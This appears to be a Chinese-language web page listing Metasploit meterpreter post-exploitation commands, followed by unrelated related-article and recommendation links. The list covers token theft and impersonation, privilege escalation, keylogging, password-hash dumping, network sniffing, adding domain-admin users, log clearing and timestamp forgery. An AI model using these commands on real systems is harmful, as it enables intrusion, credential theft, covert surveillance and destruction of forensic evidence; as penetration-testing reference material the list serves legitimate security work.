metasploit中meterpreter命令
meterpreter是Metasploit框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道。
常见的meterpreter命令
- run scriptname 运行Meterpreter脚本,在scripts/meterpreter目录下可查看所有的脚本名。
- sysinfo 列出受控主机的系统信息。
- ls 列出目标主机的文件和文件夹信息。
- use priv 加载特权提升扩展模块,来扩展Meterpreter库。
- ps 显示所有运行进程以及关联的用户账号。
- migrate PID 迁移到一个指定的进程ID(PID可通过ps从目标主机上获得)。
- use incognito 加载incognito功能(用来盗窃目标主机的令牌或是假冒用户).
- list_tokens -u 列出目标主机用户的可用令牌。
- list_tokens -g 列出目标主机用户组的可用令牌。
- impersonate_token DOMAIN_NAME\\USERNAME 假冒目标主机上的可用令牌。
- steal_token PID 盗窃给定进程的可用令牌并进行令牌假冒。
- drop_token 停止假冒当前令牌。
- getsystem 通过各种攻击向量来提升系统用户权限。
- shell 以所有可用令牌来运行一个交互的shell。
- execute -f cmd.exe -i 执行cmd.exe命令并进行交互。
- execute -f cmd.exe -i -t 以所有可用的令牌来执行cmd命令。
- execute -f cmd.exe -i -H -t 以所有可用的令牌来执行cmd命令并隐藏该进程。
- rev2self 回到控制目标主机的初始化用户账号下。
- reg command 在目标主机注册表中进行交互,创建,删除,查询等操作。
- setdesktop number 切换到另一个用户界面(该功能基于哪些用户已登录)。
- screenshot 对目标主机的屏幕进行截图。
- upload file 向目标主机上传文件
- download file 从目标主机下载文件。
- keyscan_start 针对远程目标主机开启键盘记录功能。
- keyscan_dump 存储目标主机上捕获的键盘记录。
- keyscan_stop 停止针对目标主机的键盘记录功能。
- getprivs 尽可能多的获取目标主机上的特权。
- uictl enable keyboard/mouse 接管目标主机的键盘和鼠标。
- background 将你当前的Meterpreter shell转为后台执行。
- hashdump 导出目标主机中的口令哈希值。
- use sniffer 加载嗅探模块。
- sniffer_interfaces 列出目标主机所有开放的网络接口。
- sniffer_dump interfaceID pcapname 在目标主机上启动嗅探。
- sniffer_stats interfaceID 获取正在实施嗅探网络接口的统计数据。
- sniffer_start interfaceID packet-buffer 在目标主机上针对特定范围的数据包缓冲区启动嗅探。
- sniffer_stop interfaceID 停止嗅探。
- add_user username password -h ip 在远程目标主机上添加一个用户。
- add_group_user "Domain Admins" username -h ip 将用户添加到目标主机的域管理员组中。
- clearev 清除目标主机上的日志记录。
- timestomp 修改文件属性,例如修改文件的创建时间(反取证调查)。
- reboot 重启目标主机。
metasploit中meterpreter命令的更多相关文章
- [转]Metasploit的meterpreter黑客脚本列表
原文地址: 摘要: Metasploit的框架是一个令人难以置信的黑客攻击和渗透测试工具,每一个黑客称职的应该是熟悉和有能力的. 在上一篇文章中,我提供了你的 meterpreter 命令列表.这些命 ...
- Meterpreter命令详解
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以 ...
- 了解Metasploit中的Payloads(有效载荷)
什么是payload? payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等.也有人把payloads称 为shellcode. Shellco ...
- 【逆向&编程实战】Metasploit中的安卓载荷凭什么吊打SpyNote成为安卓端最强远控
文章作者:MG1937 QQ:3496925334 CNBLOG:ALDYS4 未经许可,禁止转载 前言 说起SpyNote大家自然不陌生,这款恶意远控软件被利用在各种攻击场景中 甚至是最近也捕获到了 ...
- Kail Linux渗透测试教程之在Metasploit中扫描
Kail Linux渗透测试教程之在Metasploit中扫描 在Metasploit中扫描 在Metasploit中,附带了大量的内置扫描器.使用这些扫描器可以搜索并获得来自一台计算机或一个完整网络 ...
- 【每日一linux命令6】命令中的命令
许多命令在执行后,会进入该命令的操作模式,如 fdisk.pine.top 等,进入后我们必须要使用该 命令中的命令,才能正确执行:而一般要退出该命令,可以输入 exit.q.quit 或是按[Ctr ...
- sublime text2在windows中以命令行启动
sublime text2在windows中以命令行启动 把执行文件添加到PATH中即可,如图: 如果你和我一样习惯了mac下的简写subl,那么需要在程序目录中新建一个批处理文件subl.bat ...
- oracle中imp命令详解 .
转自http://www.cnblogs.com/songdavid/articles/2435439.html oracle中imp命令详解 Oracle的导入实用程序(Import utility ...
- linux运维中的命令梳理(四)
----------管理命令---------- ps命令:查看进程 要对系统中进程进行监测控制,查看状态,内存,CPU的使用情况,使用命令:/bin/ps (1) ps :是显示瞬间进程的状态,并不 ...
随机推荐
- matplotlib之scatter绘制散点
# 使用matplotlib.pyplot.scatter绘制散点 import matplotlib.pyplot as plt from pylab import mpl # 设置默认字体,解决中 ...
- Python调用C++类
http://blog.csdn.net/liyuan_669/article/details/25361655 C++导出类到Python http://blog.csdn.net/arnozhan ...
- 使用嵌入式jetty实现文件服务器
pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="htt ...
- BZOJ4001[TJOI2015]概率论——卡特兰数
题目描述 输入 输入一个正整数N,代表有根树的结点数 输出 输出这棵树期望的叶子节点数.要求误差小于1e-9 样例输入 1 样例输出 1.000000000 提示 1<=N<=10^9 设 ...
- Redundant Paths POJ - 3177(边—双连通分量)
题意: 在图中加边 看最少能通过加多少条边把 图变成边—双连通分量 解析: 先做一次dfs,不同的连通分量的low是不同的 注意重边 缩点 统计度为1的点 那么需要加的边为(ret+1)/2 #i ...
- python构建bp神经网络_曲线拟合(一个隐藏层)__1.可视化数据
1.将数据写入csv文件,应该可以python代码直接实现数据集的写入,但我对文件读取这块不太熟练,等我成功了再加上,这里我直接手写将数据集写入Excel 2.然后把后缀改成.csv就可以了,利用pa ...
- Leetcode 347.前K个高频元素 By Python
给定一个非空的整数数组,返回其中出现频率前 k 高的元素. 示例 1: 输入: nums = [1,1,1,2,2,3], k = 2 输出: [1,2] 示例 2: 输入: nums = [1], ...
- 13 Zabbix Item类型之Zabbix ODBC类型
点击返回:自学Zabbix之路 13 Zabbix Item类型之Zabbix ODBC类型 ODBC是C语言开发的.用于访问数据库的中间件接口 . zabbix支持查询任何ODBC支持的数据库.za ...
- ECMAScript 6 -- let和const命令
ES6新增了let命令,用来声明变量.它的用法类似于var,但是所声明的变量,只在let命令所在的代码块内有效. for (let i = 0; i ; i++) {console.log(i);} ...
- Android 屏幕手势滑动中onFling()函数的技巧分析
关于如何处理手势操作以及那四个基本固定的顺序我就不讲解了,这里直接跳到我们获得瞬间滑动后回调onFling()这个抽象函数时,应该如何根据参数比较准确的判断滑动方向.如果你没有前面的基础知识,你可以去 ...